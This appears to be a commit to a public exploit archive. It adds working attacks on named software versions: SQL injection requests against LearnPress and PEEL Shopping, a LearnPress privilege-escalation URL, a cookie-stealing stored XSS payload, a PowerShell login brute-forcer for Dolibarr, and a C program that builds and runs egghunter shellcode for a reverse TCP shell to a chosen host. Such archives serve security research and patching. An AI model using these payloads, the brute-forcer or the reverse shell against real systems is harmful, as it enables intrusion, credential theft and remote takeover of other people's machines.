DB: 2021-07-20

6 changes to exploits/shellcodes WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated) WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS) Dolibarr ERP/CRM 10.0.6 - Login Brute Force PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
2021-07-20 05:01:52 +00:00 · 2021-07-20 05:01:52 +00:00 · c385c8068c
commit c385c8068c
parent 29558b9c84
8 changed files with 448 additions and 0 deletions
--- a/exploits/php/webapps/50137.txt
+++ b/exploits/php/webapps/50137.txt
@ -0,0 +1,32 @@
+# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
+# Date: 07-17-2021
+# Exploit Author: nhattruong or nhattruong.blog
+# Vendor Homepage: https://thimpress.com/learnpress/
+# Software Link: https://wordpress.org/plugins/learnpress/
+# Version: < 3.2.6.8
+# References link: https://wpscan.com/vulnerability/10208
+# CVE: CVE-2020-6010
+
+POC:
+1. Go to url http://<host>/wp-admin
+2. Login with a cred
+3. Execute the payload
+
+
+POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: application/json, text/plain, */*
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 128
+Origin: http://localhost
+Connection: close
+Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145
+
+type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -
+
+# Modify current_items[] as you want
--- a/exploits/php/webapps/50138.txt
+++ b/exploits/php/webapps/50138.txt
@ -0,0 +1,18 @@
+# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
+# Date: 07-17-2021
+# Exploit Author: nhattruong or nhattruong.blog
+# Vendor Homepage: https://thimpress.com/learnpress/
+# Software Link: https://wordpress.org/plugins/learnpress/
+# Version: < 3.2.6.9
+# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
+# CVE: CVE-2020-11511
+
+POC:
+1. Find out your user id
+2. Login with your cred
+3. Execute the payload
+
+
+http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
+
+# Done!
--- a/exploits/php/webapps/50139.txt
+++ b/exploits/php/webapps/50139.txt
@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
+# Date: 18/07/2021
+# Exploit Author: Vikas Srivastava
+# Vendor Homepage:
+# Software Link: https://wordpress.org/plugins/mimetic-books/
+# Version: 0.2.13
+# Category: Web Application
+# Tested on Mac
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.7.2
+2. Install and activate Mimetic Books
+3. Navigate to Settings >> Mimetic Books API and enter the XSS payload into the Default Publisher ID input field.
+4. Click Save Changes.
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
+6. Payload Used: "><script>alert(document.cookie)</script>
--- a/exploits/php/webapps/50140.ps1
+++ b/exploits/php/webapps/50140.ps1
@ -0,0 +1,68 @@
+# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force
+# Date:2020-01-18
+# Exploit Author: Creamy Chicken Soup
+# Vendor Homepage: https://www.dolibarr.org
+# Software Link: https://sourceforge.net/projects/dolibarr/
+# Version: 10.0.6
+# Tested on: Windows 10 - 64bit
+# CVE: CVE-2020-7995
+
+function brute($url,$username,$passwd){
+try{
+    $WebResponse = Invoke-WebRequest $url
+    $a=$WebResponse.Forms.fields
+    $fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}
+    $WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields
+    if($WebResponse1.Forms.Id -ne "login"){
+        Write-Host "username password is match"
+        Write-Warning "user: $username ,passwoed: $passwd"
+        return $true
+       }
+}catch{
+    Write-Warning "Something Wrong!"
+    }
+}
+
+function fileinput($filepath,$url){
+    try{
+        Write-Host "Target: $url"
+        $fp=Get-Content -Path $filepath
+        foreach($line in $fp){
+            $s=$line -split ':'
+            $username=$s[0]
+            $passwd=$s[1]
+            Write-Host "[+] Check $username : $passwd"
+            $bf=brute $url $username $passwd
+            if($bf -eq $True){
+                break
+            }
+    }
+    }catch{
+        Write-Warning "File is error"
+    }
+}
+
+$textart=@'
+ ____  ____  _____ ____  _     ___  _ ____  _     _  ____  _  __ _____ _      ____  ____  _     ____ 
+/   _\/  __\/  __//  _ \/ \__/|\  \///   _\/ \ /|/ \/   _\/ |/ //  __// \  /|/ ___\/  _ \/ \ /\/  __\
+|  /  |  \/||  \  | / \|| |\/|| \  / |  /  | |_||| ||  /  |   / |  \  | |\ |||    \| / \|| | |||  \/|
+|  \__|    /|  /_ | |-||| |  || / /  |  \__| | ||| ||  \_ |   \ |  /_ | | \||\___ || \_/|| \_/||  __/
+\____/\_/\_\\____\\_/ \|\_/  \|/_/   \____/\_/ \|\_/\____/\_|\_\\____\\_/  \|\____/\____/\____/\_/   
+                                                                                                     
+'@
+
+Write-Host $textart
+Write-Host @'
+Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability
+Date: 2020-01-18
+Exploit Author: CreamyChickenSoup
+Vendor Homepage: https://www.dolibarr.org
+Version: 10.0.6
+CVE: CVE-2020-7995
+Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home
+Twitter: @creamychickens1
+cve submited:Tufan Gungor
+'@
+$url=Read-Host "Enter Url:"
+$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"
+fileinput $filepath $url
--- a/exploits/php/webapps/50142.txt
+++ b/exploits/php/webapps/50142.txt
@ -0,0 +1,93 @@
+# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
+# Date: 2021-07-10
+# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
+# Vendor Homepage: https://www.peel.fr
+# Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
+# Version: prior to 9.4.0
+# Tested on: Windows 10, XAMPP
+# Reference: https://github.com/advisto/peel-shopping/issues/3
+
+
+################
+# Description  #
+################
+
+# PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.
+
+
+#####################
+# PoC of detection  #
+#####################
+
+1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".
+
+PoC #1) param id - time-based SQLi
+Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
+Request: The response duration = 418 bytes | 7,719 millis
+========
+
+GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/peel-shopping_9_4_0/
+DNT: 1
+Connection: close
+Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+Cache-Control: max-age=0
+
+---
+
+2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.
+
+PoC #2) param id - time-based SQLi
+Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
+Request: The response duration = 418 bytes | 5,112 millis
+========
+
+GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/peel-shopping_9_4_0/
+DNT: 1
+Connection: close
+Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+Cache-Control: max-age=0
+
+---
+
+3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.
+
+PoC #3) param id - time-based SQLi
+Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
+Request: The response duration = 418 bytes | 10,140 millis
+========
+
+GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/peel-shopping_9_4_0/
+DNT: 1
+Connection: close
+Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+Cache-Control: max-age=0
+
+---
+
+# For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3. 
+# The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1
+# The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44270,3 +44270,8 @@ id,file,description,date,author,type,platform,port
 50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",2021-07-15,"Simone Cristofaro",webapps,php,
 50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",2021-07-16,Photubias,webapps,java,
 50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",2021-07-16,"Metin Yunus Kandemir",webapps,hardware,
+50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",2021-07-19,nhattruong,webapps,php,
+50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",2021-07-19,nhattruong,webapps,php,
+50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",2021-07-19,"Vikas Srivastava",webapps,php,
+50140,exploits/php/webapps/50140.ps1,"Dolibarr ERP/CRM 10.0.6 - Login Brute Force",2021-07-19,"Creamy Chicken Soup",webapps,php,
+50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",2021-07-19,faisalfs10x,webapps,php,
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -1040,3 +1040,4 @@ id,file,description,date,author,type,platform
 49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",2021-06-10,d7x,shellcode,linux_x86
 50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",2021-07-13,d7x,shellcode,linux_x86
 50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2021-07-13,d7x,shellcode,linux_x86
+50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",2021-07-19,d7x,shellcode,linux_x86
--- a/shellcodes/linux_x86/50141.c
+++ b/shellcodes/linux_x86/50141.c
@ -0,0 +1,214 @@
+# Exploit Title: Linux/x86 - Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
+# Date: 18/07/2021
+# Exploit Author: d7x
+# Tested on: Ubuntu x86
+
+/***
+Linux/x86 - Egghunter Reverse TCP Shell Shellcode Generator with dynamic IP and port Shellcode
+Author: d7x
+https://d7x.promiselabs.net/
+https://www.promiselabs.net/
+***/
+
+/*  
+	Egghunter payloads from skape modified to work on a modern up to date architecture
+	For detailed information on the egghunter payloads and egghunter research refer to the original whitepaper by skape:
+	Safely Searching Process Virtual Address Space http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
+	Example usage of egghunters https://www.fuzzysecurity.com/tutorials/expDev/4.html
+*/
+
+/* Usage: $ gcc -fno-stack-protector -z execstack -o egghunter egghunter_shellcode.c
+		      $ ./egghunter 2 3d7xC0D3 192.168.1.137 6666 # This will output AND execute the egghunter! (if you get a seg fault/core dumped error either your shellcode output contains null bytes or you have no idea what you are doing)
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <netdb.h>
+
+void PrintShellcode(unsigned char* s);
+void change_shellcode_bytes(unsigned char shellcode[], int offset, int n, unsigned char new[]);
+unsigned char* ConvertStrToHex(unsigned char* s);
+
+unsigned char egghunter[][200] = { \
+{"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"}, // access method - 39 bytes
+{"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"}, //access revisited (fixed) - 37 bytes
+{"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"} //sigaction method (fixed) - 32 bytes
+};
+
+/* unsigned char egghunter[] = \
+"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (fixed) - 32 bytes
+//"\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (original version by skape - 30 bytes) 
+//"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (fixed) - 37 bytes
+//"\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (original version by skape) - 35 bytes
+//"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"; // access method - 39 bytes
+*/
+
+/* Reverse TCP Shell: 
+egg \x90\x50\x90\x50\x90\x50\x90\x50
+127.1.1.1 4444 */
+unsigned char shellcode[] = \
+"\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at eggsize + 26th byte; Port at eggsize + 32nd byte
+
+int eggsize = 4; //default
+ 
+main(int argc, char *argv[])
+{
+  
+  if (argc < 2)
+  {
+	  printf("Usage: %s <egghunter> [egg] [IP] [Port]", argv[0]);
+  	printf("\nExample: %s 0 0x9050 127.1.1 4444\n"
+		   			"%s 1 AABB 127.1.1.1 4444\n"
+  					"%s 2 AABBCCDD 127.1.1.1 4444\n"
+  					"%s 2 3d7xC0D3 127.1.1.1 4444\n", argv[0], argv[0], argv[0], argv[0]);
+  	printf("\n\nDefault egg: \\x90\\x50\\x90\\x50 (push eax, nop, push eax, nop)"
+  			"\nDefault shellcode IP and port 127.1.1.1:4444");
+  	printf("\n\nAvailable egghunters:"
+  		   "\n0 - access method (39 bytes), requires executable egg"
+  		   "\n1 - access revisited (37 bytes)"
+  		   "\n2 - sigaction (32 bytes)\n"
+  	);
+  	
+  	return 0;
+  }
+  
+  int eh = atoi((char *)argv[1]);
+  if (eh < 0 || eh > 2)
+  {
+  	printf("Invalid Egghunter: %d!\n", eh);
+  	
+  	return 0;
+  }
+  
+  if (argc > 2)
+  {
+  	if (argv[2][0] == '0' && argv[2][1] == 'x') argv[2] += 2;
+  	
+  	if (strlen(argv[2]) != 4 && strlen(argv[2]) != 8)
+  	{
+  	  printf("Egg has to be at least 4 or exactly 8 bytes!"
+  	  		"\nExample eggs: 9050, 9060, C0D3," 
+  	  		"\n				d7xC0D3D, 3d7xC0D3, 3d7xC0D3, 7d7xC0D3"
+  	  		"\n"
+  	  );
+  	  
+  	  return 0;
+    }
+    
+    int i;
+    for (i = 0; i < strlen(argv[2]); i+=2)
+      if (argv[2][i] == '0' && argv[2][i+1] == '0')
+      {
+        printf("No null bytes!\n");
+        return 0;
+      }
+    
+  }
+  
+  /* change egg if provided */
+  int eh_offset = 1;				        // default offset for access method (39 bytes)   
+  if (eh == 1) eh_offset = 23;		  // offset for access revisited (37 bytes)
+  else if (eh ==2) eh_offset = 18;	// offset for sigaction (32 bytes)
+  
+  if (argc > 2) {
+
+  	unsigned char* new_egg = argv[2], *s, *tmp;
+  	printf("Changing egg to %s...\n", new_egg);
+
+  	s = ConvertStrToHex(argv[2]);
+  	tmp = s;
+
+  	
+  	//fill buffer - 4 bytes of [egg], then concatenate additional 4 bytes of [egg] (8 bytes) 
+  	strcat(tmp, s);
+  	if (strlen(argv[2]) == 4) 
+  		strcat(tmp, tmp);
+  	
+  	//PrintShellcode(s);
+  	change_shellcode_bytes(egghunter[eh], eh_offset, eh_offset+3, s);
+  	change_shellcode_bytes(shellcode, 0, 7, tmp);
+  }
+  
+  printf("Egghunter %d, size %d\n", eh, strlen(egghunter[eh] ) );
+  printf("Egghunter shellcode: \n");
+  PrintShellcode(egghunter[eh]);
+  
+  printf("\nReverse TCP Shellcode (%d bytes): \n", strlen(shellcode));
+  
+  // change shellcode IP address
+  unsigned char *s2 = shellcode;
+  if (argc > 3)
+  {
+	  printf("%s\n", argv[3]);
+  	
+  	// convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
+    struct sockaddr_in ipaddr;
+    inet_aton(argv[3], &ipaddr.sin_addr.s_addr);
+    
+    
+    int i = eggsize*2+26, a;
+    int e = i+3;
+    
+    for (i, a = 0; i <= e; i++, a+=8) 
+	  {
+		  s2[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ; 
+		  printf("Byte %d: %.02x\n", i, s2[i]);
+	  }
+	  
+  }
+  
+  // change shellcode Port
+  int port = 4444; //0x115c - default
+
+  if (argc > 4)
+  {
+  	port = atoi(argv[4]);
+	  unsigned int p1 = (port >> 8) & 0xff;
+	  unsigned int p2 = port & 0xff;
+   	s2[eggsize*2+32] = (unsigned char){p1};
+    s2[eggsize*2+33] = (unsigned char){p2};
+  }
+  
+  printf("Port %d\n", port);
+  PrintShellcode(s2);
+  
+  printf("\n");
+  int (*ret)() = (int(*)())egghunter[eh];
+
+  ret(); 
+
+}
+
+void change_shellcode_bytes(unsigned char* shellcode_n, int offset, int n, unsigned char* new)
+{
+	int i, a;
+  for (i = offset, a = 0; i <= n; i++, a++) 
+		shellcode_n[i] = (unsigned char) {new[a]}; 
+		// printf("Byte %d: %.02x\n", i, shellcode_n[i]);
+}
+
+void PrintShellcode(unsigned char* s)
+{
+	printf("\"");
+	while (*s)
+		printf("\\x%.02x", (unsigned int) *s++);
+		
+	printf("\"\n");
+}
+
+unsigned char* ConvertStrToHex(unsigned char* s)
+{
+	if (s[0] == '0' && s[1] == 'x') s += 2;
+	unsigned char buf[strlen(s)/2];
+	buf[strlen(s)/2] = '\0';
+
+	int len = sizeof(buf);
+	size_t count;
+
+	for (count = 0; count < len; count++) {
+		sscanf(s, "%2hhx", &buf[count]);
+		s += 2;
+	}
+
+	return buf;
+}